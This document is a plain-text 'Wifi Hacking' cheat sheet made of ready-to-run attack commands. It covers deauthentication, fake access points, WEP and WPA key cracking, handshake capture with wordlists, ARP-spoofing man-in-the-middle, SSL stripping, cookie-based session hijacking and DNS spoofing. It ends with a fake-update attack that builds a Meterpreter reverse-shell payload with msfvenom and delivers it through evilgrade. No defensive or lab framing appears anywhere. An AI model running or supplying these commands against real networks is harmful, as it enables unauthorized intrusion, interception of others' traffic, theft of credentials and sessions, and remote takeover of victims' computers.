Wifi Hacking.txt

> ifconfig wlan0 down

> airmon-ng start wlan0

> airmon-ng stop wlan0

> airmon-ng start mon0

> airodump-ng mon0

*crtl+C

> airodump-ng --channel [channel] --bssid [bssid] --write [file-name] [interface]
ex: airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write file mon0

~Deauthenticate all clients in a specific network
> aireplay-ng --deauth [number-of packets] -a [Access-Point] [interface]
ex: aireplay-ng --deauth 1000 -a 11:22:33:44:55:66 mon0

~Deauthenticate a specific client in a network
> aireplay-ng --deauth [number-of packets] -a [Access-Point] -c [target=STATION] [interface]
ex: aireplay-ng --deauth 1000 -a 11:22:33:44:55:66 -c AA:BB:CC:DD:EE:FF mon0

######Deauthentication attacks#######


> airodump-ng --write [filename] --output-format [file-format] [interface]
ex: airodump-ng --write file --output-format csv mon0

> airdrop-ng -t [csv-file] -r [rules-file] -i [interfaces]
ex: airdrop-ng -t file-01.csv -r rules -i mon0

--- Creating Rule-File for Air-drop (Summary) ---
~ d/[bssid-target]|[Target Device]
~a/[fake-mac/your-bssid]|[Target Device]

For More Info: [URL]http://www.aircrack-ng.org/doku.php?id=airdrop-ng&DokuWiki=fc8c2e4leoquoc83lj0numire0[/URL]

###### Creating Fake Access Point ######

~Edit dhcp configuration file

> echo -e "interface=at0\ndhcp-range=192.168.0.3,192.168.0.150,12h" > /etc/dnsmasq.conf

~Start Fake AP

> airbase-ng -e [fake network name] -c [channel] [interface]
ex: airbase-ng -e fake-ap -c 6 mon0

ifconfig at0 192.168.0.1 up

~Removing IPTABLEs rules

> iptables --flush
> iptables --table nat --flush
> iptables --delete-chain
> iptables --tables nat --delete-chain

~Enable Packet forward in iptables

> iptables -P FORWARD ACCEPT

~Link the wifi card and the card thats connected to the internet

> iptables -t nat -A POSTROUTING -o [internet interface] -j MASQUERADE
ex: iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

~Start dnsmasq

> sudo dnsmasq

~Enable IP forward

> echo "1" > /proc/sys/net/ipv4/ip_forward

###### WEP Cracking Basic ######

> airodump-ng --channel [channel] --bssid [bssid] --write [file-name] [interface]
ex: airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write file mon0

> aircrack-ng [file-name]
ex: aircrack-ng file-01.cap

###### Fake Authentication / Packet Injection ######

> aireplay-ng --fakeauth 0 -a [target MAC] -h [your MAC] [interface]
ex: aireplay-ng --fakeauth 0 -a 11:22:33:44:55:66 -h AA:BB:CC:DD:EE:FF mon0

--FOLLOWING Technique can be execute, depends on methodology you want :)

~ARP request reply Technique

> aireplay-ng --arpreply -b [target MAC] -h [your MAC] [interface]
ex: aireplay-ng --arpreplay -b 11:22:33:44:55:66 -h AA:BB:CC:DD:EE:FF mon0

~Chop Chop Technique

> aireplay-ng --chopchop -b [target MAC] -h [your MAC] [interface]
ex: aireplay-ng --chopchop -b 11:22:33:44:55:66 -h AA:BB:CC:DD:EE:FF mon0

> packetforge-ng -0 -a [target MAC] -h [your MAC] -k 255.255.255.255 -l 255.255.255.255 -y [out from last step.xor] -w [output]
ex: packetforge-ng -0 -a 1:22:33:44:55:66 -h AA:BB:CC:DD:EE:FF -k 255.255.255.255 -l 255.255.255.255 -y 1122out.xor -w file

> aireplay-ng -2 -r [out from last step] [interface]
ex: aireplay-ng -2 -r file mon0

~Fragmentation Technique

 aireplay-ng --fragment -b [target MAC] -h [your MAC] [interface]
ex: aireplay-ng --fragment -b 11:22:33:44:55:66 -h AA:BB:CC:DD:EE:FF mon0

> packetforge-ng -0 -a [target MAC] -h [your MAC] -k 255.255.255.255 -l 255.255.255.255 -y [out from last step.xor] -w [output]
ex: packetforge-ng -0 -a 1:22:33:44:55:66 -h AA:BB:CC:DD:EE:FF -k 255.255.255.255 -l 255.255.255.255 -y 1122out.xor -w file

> aireplay-ng -2 -r [out from last step] [interface]
ex: aireplay-ng -2 -r file mon0

###### WPA Cracking Basic ######

> wash -i mon0

~Reaver

> reaver -b [target bssid] -c [channel] -i [interface]
ex: reaver -b 11:22:33:44:55:66 -c 6 -i mon0

###### Capturing Handshake #######

> airodump-ng -c [channel] -d [bssid] -w [filename] [inteface]
ex: airodump-ng -c 6 -d 11:22:33:44:55:66 -w file mon0

> aireplay-ng --deauth [number of deauth packets] -a [bssid] -c [station] [interface]
ex: aireplay-ng --deauth 0 -a 11:22:33:44:55:66 -c AA:BB:CC:DD:EE:FF mon0

###### Creating Wordlist w/ crunch ######

> crunch [min] [max] [characters=lower|upper|numbers|symbols] -t [pattern] -o [filename]
ex: crunch 6 8 123456!"&$% -t a@@@@b -o wordlist.txt

###### Cracking the Key w/ Handshake file ######

> aircrack-ng [handshake file] -w [wordlist] [interface]
ex: aircrack-ng file-01.cap -w wordlist.lst mon0

####### Creating a PMK wordlist ######

~Create a database & import wordlist

> airolib-ng [db_name] --import passwd [wordlist]
ex: airolib-ng db_wordlist --import passwd wordlist.lst

~Import target essid

> airolib-ng [db_name] --import essid [wordlist]
ex: airolib-ng db_wordlist --import essid wordlist.lst

~Compute PMK for the wordlist

> airolib-ng [db_name] --batch
ex: airolib-ng db_wordlist --batch

~Cracking the key using PMK DB

> aircrack-ng -r [db_name] [handshake file]
ex: aircrack-ng -r db_wordlist file-01.cap

###### Crackin .cap file w/ hashcat ######

[URL]https://hashcat.net/cap2hccap/[/URL]

[URL]https://www.blackmoreops.com/2014/03/27/cracking-wpa-wpa2-with-hashcat-kali-linux/[/URL]

++++++++++++++++++++++
Post Connection Attack
++++++++++++++++++++++

###### Info Gathering ######

~Netdiscover

> netdiscover -i [interface] -r [range]
ex: netdiscover -i wlan0 -r 192.168.1.1/24

~Autoscan

[URL]http://downloads.sourceforge.net/project/autoscan/AutoScan/autoscan-network%201.50/AutoScan-Network-Linux-1.50.bin.tar.gz?r=&ts=1475845627&use_mirror=nchc[/URL]

~Nmap/Zenmap

-Ping Scan
> nmap -sn [IP/IP Range]

-Quick Scan
> nmap -T4 -F [IP/IP Range]

-Quick Scan Plus
> nmap -sV -T4 -O -F --version-light [IP/IP Range]

####### MITM ######

~Arpspoof

> arpspoof -i [interface] -t [target ip] [AP IP/ Default Gateway]
ex: arpspoof -i wlan0 -t 192.168.1.12 192.168.1.1

> arpspoof -i [interface] -t [AP IP/ Default Gateway] [target ip]
ex: arpspoof -i wlan0 -t 192.168.1.1 192.168.1.12

> echo "1" > /proc/sys/net/ipv4/ip_forward

~Ettercap

> ettercap -Tq -M arp:remote -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
ex: ettercap -Tq -M arp:remote -i wlan0 /192.168.1.1/ /192.168.1.12/
ex2: ettercap -Tq -M arp:remote -i wlan0 // #target all network

> echo "1" > /proc/sys/net/ipv4/ip_forward

--configure ettercap config

> gedit /etc/ettercap/etter.conf #Uncomment Linux::Iptables

###### MITM Bypassing HTTPS/SSL #######

~configure etter.conf

> gedit /etc/ettercap/etter.conf

--change this::
[privs]
ec_uid = 65534                # nobody is the default
ec_gid = 65534                # nobody is the default
--into this
[privs]
ec_uid = 0               # nobody is the default
ec_gid = 0               # nobody is the default

~iptables

> iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

~SSLSTRIP

> sslstrip -p

~Ettercap

> ettercap -Tq -M arp:remote -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
ex: ettercap -Tq -M arp:remote -i wlan0 /192.168.1.1/ /192.168.1.12/
ex2: ettercap -Tq -M arp:remote -i wlan0 // #target all network


> echo "1" > /proc/sys/net/ipv4/ip_forward

###### SESSION Hijacking ######

> ettercap -Tq -M arp:remote -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
ex: ettercap -Tq -M arp:remote -i wlan0 /192.168.1.1/ /192.168.1.12/
ex2: ettercap -Tq -M arp:remote -i wlan0 // #target all network

> echo "1" > /proc/sys/net/ipv4/ip_forward

[URL]https://www.cookiecadger.com/files/CookieCadger-1.08.jar[/URL]

> java -jar CookieCadger-1.08.jar

###### DNS Spoofing ######

~configure etter.dns

> gedit /etc/ettercap/etter.dns
--> *.sitename.com A *your_ip_here

> ettercap -Tq -M arp:remote -P dns_spoof -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
ex: ettercap -Tq -M arp:remote -P dns_spoof -i wlan0 /192.168.1.1/ /192.168.1.12/
ex2: ettercap -Tq -M arp:remote -P dns_spoof -i wlan0 // #target all network

> echo "1" > /proc/sys/net/ipv4/ip_forward

$$$$ ETTERCAP PLUGINS $$$$

[URL]https://linux.die.net/man/8/ettercap_plugins[/URL]

###### Ettercap Filters ######

> echo "kill();drop();" > drop-packets.filter

> etterfilter drop-packets.filter -o drop-packets.ef

> ettercap -Tq -M arp:remote -F drop-packets.ef -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
ex: ettercap -Tq -M arp:remote -F drop-packets.ef -i wlan0 /192.168.1.1/ /192.168.1.12/
ex2: ettercap -Tq -M arp:remote -F drop-packets.ef -i wlan0 // #target all network

> echo "1" > /proc/sys/net/ipv4/ip_forward

###### Ettercap GTK/Gui ######

> ettercap -G

###### XPlico #####

> service apache2 start

> service xplico start

[URL]127.0.0.1:9876/[/URL]
uname | pass :: xplico

> ettercap -Tq -M arp:remote -w [filename] -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
ex: ettercap -Tq -M arp:remote -w file -i wlan0 /192.168.1.1/ /192.168.1.12/
ex2: ettercap -Tq -M arp:remote -w file -i wlan0 // #target all network

#### Fake Update ####

~metasploit

> msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=1337 X > update.exe

> msfconsole
> use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST your_ip
> set LPORT 1337
> exploit

~Evilgrade

> evilgrade
> configure [module]
> set agent update.exe
> start

~ DNS Spoof

~configure etter.dns

> gedit /etc/ettercap/etter.dns
--> *.sitename.com A *your_ip_here

> ettercap -Tq -M arp:remote -P dns_spoof -i [interface] [AP MAC]/[AP IP/ DEFAULT GATEWAY]/[PORT] [TARGET MAC]/[TARGET IP]/[TARGET PORT]
ex: ettercap -Tq -M arp:remote -P dns_spoof -i wlan0 /192.168.1.1/ /192.168.1.12/
ex2: ettercap -Tq -M arp:remote -P dns_spoof -i wlan0 // #target all network

> echo "1" > /proc/sys/net/ipv4/ip_forward

==================================================================
E N D